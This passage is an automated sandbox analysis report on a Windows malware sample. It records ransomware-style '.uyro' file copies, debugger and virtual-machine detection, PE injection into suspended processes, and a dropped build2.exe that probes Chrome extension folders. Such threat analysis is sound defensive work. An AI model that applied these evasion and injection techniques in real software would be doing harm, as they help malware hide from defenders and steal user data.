Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\bn-IN\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\OneDriveUpdaterService.exe.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\zh-TW\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\IntlProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\es\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\AppxProvider.dll.mui.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\FfuProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\OneDriveSetup.exe.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\DismHost.exe.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\bg\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\hu\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ug\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\et\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\OneDrive.exe Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\prs-AF\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\pa-Arab-PK\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\lv\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\gu\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\af\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\fa\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\cs\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\en-GB\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DmiProvider.dll.mui.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\yo-NG\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sr-Cyrl-RS\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\GenericProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\si-LK\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\CompatProvider.dll.mui.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\WimProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ha-Latn-NG\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sr-Cyrl-BA\FileSync.LocalizedResources.dll.mui Jump to dropped file
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 0_2_0218C71C rdtsc 0_2_0218C71C
Is looking for software installed on the system
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Found evaded block containing many API calls
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Evaded block: after key decision
Contains functionality to query network adapater information
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free, 1_2_0040E670
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Thread delayed: delay time: 700000 Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 0_2_00403341 GetModuleHandleW,GetNamedPipeHandleStateW,InterlockedExchange,GetConsoleAliasExesLengthW,EnumCalendarInfoW,InterlockedCompareExchange,GetConsoleTitleA,GetLogicalDriveStringsW,FlushFileBuffers,GetShortPathNameA,GetComputerNameExA,CopyFileW,CloseHandle,LoadLibraryA,InterlockedIncrement,InterlockedIncrement,GetCharWidthA,CreateNamedPipeW,WinHttpSetOption,GlobalFlags,FindFirstVolumeA,CreateJobObjectA,GetModuleHandleW,FindResourceA,GetHandleInformation,CancelTimerQueueTimer,VerifyVersionInfoA,InterlockedIncrement,GetCommandLineA,SearchPathA,WriteConsoleOutputA,GetCPInfoExW,GetBinaryTypeA, 0_2_00403341
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: U59WtZz2Sg.exe, 00000005.00000003.442737523.0000000003060000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "VMware7,1
Source: U59WtZz2Sg.exe, 00000001.00000002.309333015.0000000000827000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000002.309384223.000000000087D000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.385404722.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000002.574964169.00000000008AD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: U59WtZz2Sg.exe, 00000001.00000002.309333015.0000000000827000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: U59WtZz2Sg.exe, 00000001.00000002.309333015.0000000000827000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Z
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose, 1_2_00410160
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose, 1_2_0040F730
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 0_2_0040322F LoadLibraryA,GetProcAddress,VirtualProtect, 0_2_0040322F
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 0_2_0218B0A3 push dword ptr fs:[00000030h] 0_2_0218B0A3
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe Process queried: DebugPort
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 0_2_00405D0D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00405D0D
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0042A57A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 1_2_0042A57A
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_00447CAC __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock, 1_2_00447CAC
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 0_2_0218C71C rdtsc 0_2_0218C71C
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 0_2_0040485B __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0040485B
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 0_2_0040A05B SetUnhandledExceptionFilter, 0_2_0040A05B
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 0_2_00405D0D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00405D0D
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 0_2_004081E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_004081E1
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_004329EC
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_004329BB SetUnhandledExceptionFilter, 1_2_004329BB

HIPS / PFW / Operating System Protection Evasion
barindex
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Memory written: C:\Users\user\Desktop\U59WtZz2Sg.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Memory written: C:\Users\user\Desktop\U59WtZz2Sg.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe Memory written: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe Memory written: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe Memory written: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe Memory written: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe base: 400000 value starts with: 4D5A
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Process created: C:\Users\user\Desktop\U59WtZz2Sg.exe C:\Users\user\Desktop\U59WtZz2Sg.exe Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Process created: C:\Users\user\Desktop\U59WtZz2Sg.exe "C:\Users\user\Desktop\U59WtZz2Sg.exe" --Admin IsNotAutoStart IsNotTask Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Process created: C:\Users\user\Desktop\U59WtZz2Sg.exe "C:\Users\user\Desktop\U59WtZz2Sg.exe" --Admin IsNotAutoStart IsNotTask Jump to behavior
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe Process created: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe --Task Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Process created: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe "C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe" Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Process created: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe "C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe Process created: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe "C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe" --AutoStart Jump to behavior
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe Process created: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe "C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe"
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe Process created: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe "C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe" --AutoStart
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle, 1_2_00419F90
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: GetLocaleInfoA, 0_2_0040D8D8
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free, 1_2_0043404A
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage, 1_2_00438178
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 1_2_00440116
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP, 1_2_004382A2
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: GetLocaleInfoW,_GetPrimaryLen, 1_2_0043834F
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s, 1_2_00438423
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 1_2_004335E7
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: EnumSystemLocalesW, 1_2_004387C8
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: GetLocaleInfoW, 1_2_0043884E
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free, 1_2_00432B6D
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW, 1_2_00437BB3
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: EnumSystemLocalesW, 1_2_00437E27
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 1_2_00437E83
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 1_2_00437F00
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson, 1_2_0042BF17
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage, 1_2_00437F83
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free, 1_2_00432FAD
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe Queries volume information: C:\ VolumeInformation
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_00427756 cpuid 1_2_00427756
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 0_2_0040A933 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_0040A933
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0042FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 1_2_0042FE47
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle, 1_2_00419F90
